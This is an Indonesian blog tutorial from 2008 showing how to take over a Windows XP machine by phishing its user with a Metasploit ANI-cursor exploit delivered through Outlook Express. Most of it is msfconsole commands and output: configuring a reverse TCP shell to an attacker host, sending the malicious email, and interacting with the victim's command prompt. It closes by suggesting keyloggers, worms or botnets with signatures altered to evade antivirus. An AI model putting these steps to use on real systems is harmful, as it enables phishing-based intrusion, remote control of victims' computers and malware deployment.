Defeating Windows XP all version through outlook express

ehhmmmmmmmm……….akhirnya nulis lagi…

kali ini coba saya demonstrasikan cara take over komputer windows all version+full pacth+antivirus updated memanfaatkan kelemahan outlook express….
kali ini saya menggunakan exploit ani_loadimage_chunksize.kebetulan dah ada didalam metasploit…
exploit ini akan meng-exploitasi file USER32.dll ( LoadAniIcon() function )..
untuk lebih jelasnya silahkan lihat di <a href=”http://downloads.securityfocus.com/vulnerabilities/exploits/ani_loadimage_chunksize2.rb&#8221;
exploit ini bersifat remote.artinya hacker bisa melakukan bind atau reverse command prompt pada komputer korban..

Kasus :
hacker akan mencoba mengirim email phising ke target..setelah target membaca email tersebut dengan outlook express,hacker berhasil melakukan bind command prompt komputer korban
disini saya menggunakan server email zimbra pada komputer opensuse ( 172.18.3.188 ) dengan doma
Ok…Here We go……

linux yang saya gunakan adalah backtrack 3…my favourite linux..

1. checking network connection

bt ~ # ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:0C:29:5C:65:69
inet addr:172.18.100.100 Bcast:172.18.255.255 Mask:255.255.0.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:40687 errors:0 dropped:0 overruns:0 frame:0
TX packets:728 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:4219258 (4.0 MiB) TX bytes:877329 (856.7 KiB)
Interrupt:16 Base address:0x2000

bisa di lihat bahwa ip attacker 172.18.100.100


2. move to metapsploit directory

bt framework3 # cd /pentest/exploits/framework3
bt framework3 # ls
README framework3@ modules/ msfelfscan* msfpayload* scripts/
data/ karma.rc msfcli* msfencode* msfpescan* tools/
documentation/ lib/ msfconsole* msfgui* msfweb*
external/ load.gif msfd* msfopcode* plugins/
bt framework3 #

3. executing metasploit

bt framework3 # ./msfconsole


__. .__. .__. __.
_____ _____/ |______ ____________ | | ____ |__|/ |_
/ \_/ __ \ __\__ \ / ___/\____ \| | / _ \| \ __\
| Y Y \ ___/| | / __ \_\___ \ | |_> > |_( ) || |
|__|_| /\___ >__| (____ /____ >| __/|____/\____/|__||__|
\/ \/ \/ \/ |__|

=[ msf v3.2-release
+ -- --=[ 294 exploits - 124 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 58 aux

msf > msf > use windows/email/ani_loadimage_chunksize
msf exploit(ani_loadimage_chunksize) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(ani_loadimage_chunksize) > set RHOST ian.org
RHOST => ian.org
msf exploit(ani_loadimage_chunksize) > set LHOST 172.18.100.100
LHOST => 172.18.100.100
msf exploit(ani_loadimage_chunksize) > set LPORT 443
LPORT => 443
msf exploit(ani_loadimage_chunksize) >
msf exploit(ani_loadimage_chunksize) > set RPORT 25
RPORT => 25
msf exploit(ani_loadimage_chunksize) > set MAILFROM ian@hacking.com
MAILFROM => ian@hacking.com
msf exploit(ani_loadimage_chunksize) > set MAILTO laharisi@ian.org
MAILTO => laharisi@ian.org
msf exploit(ani_loadimage_chunksize) > exploit

note :
MAILFROM : alamt email hacker
MAILTO : alamt email korban
RHOST : domain komputer korban
LHOST : alamt komputer hacker
PAYLOAD : windows/shell_reverse_tcp ( melakukan reverse shell terhadap command prompt komputer korban )

4..ketika exploit di jalankan,exploit akan mengirim email ke alamat yang sudah di tentukan.

msf exploit(ani_loadimage_chunksize) > exploit
[*] Started reverse handler
[*] Connecting to SMTP server ian.org:25...
[*] SMTP: 220 ian.ian.org ESMTP Postfix
[*] SMTP: 250-ian.ian.org
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
[*] SMTP: 250 2.1.0 Ok
[*] SMTP: 250 2.1.5 Ok
[*] Sending the message (701857 bytes)...
[*] SMTP: 354 End data with .
[*] SMTP: 250 2.0.0 Ok: queued as D7A17113913
[*] Closing the connection...
[*] SMTP: 221 2.0.0 Bye
[*] Waiting for a payload session (backgrounding)...
msf exploit(ani_loadimage_chunksize) >

5..ketika korban membuka email tersebut dengan outlook express maka komputer korban akan membuka UNPRIVILIGED PORT yang melakukan reverse ke command prompt ( ingat PAYLOAD diatas ).kkkkkk..

6.. apa yang terjadi pada konsole komputer hacker..????hacker berhasil mendapatkan sebuah sesi koneksi ke komputer korban dengan hak administrator..

msf exploit(ani_loadimage_chunksize) > [*] Command shell session 1 opened (172.18.100.100:443 -> 172.18.2.151:1039)
msf exploit(ani_loadimage_chunksize) > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
1 Command shell 172.18.100.100:443 -> 172.18.2.151:1039

7...waktunya take over..just type session -i


msf exploit(ani_loadimage_chunksize) > sessions -i 1
[*] Starting interaction with 1...

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\master>
C:\Documents and Settings\master>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 172.18.2.151
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 172.18.2.1

C:\Documents and Settings\master>

akhirnya kita bisa mendapatkan command prompt komputer korban.....uuhhhhhhhhh
apakah hacking sampe disini..???it's not over....hacking has just began..
setelah itu hacker bisa meng-upload berbagai program misalnya keylogger,virus,worm..kalo saya seh lebih senang Meng-Upload BOTNET such as spyboot,RX-boot aka spike..tapi jangan lupa ganti signature dari bot agar tidak di kenali oleh anti virus.configuring own irc server - > uploading botnet --> ....??!! masih banyak...gk akan saya jelaskan...cukup sampe disini...

Tutorial ini dibuat hanya untuk kepentingan penelitian aja..tidak digunakan untuk hal2 yang merusak..

______________________________________________________________________________________________
Thist Tutorial Dedicated to my sweet heart (H***Y)

Next Tutorial : "upload backdoor,trojan,botnet"

Posted on September 15, 2008, in Hacking & security and tagged . Bookmark the permalink. Leave a comment.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s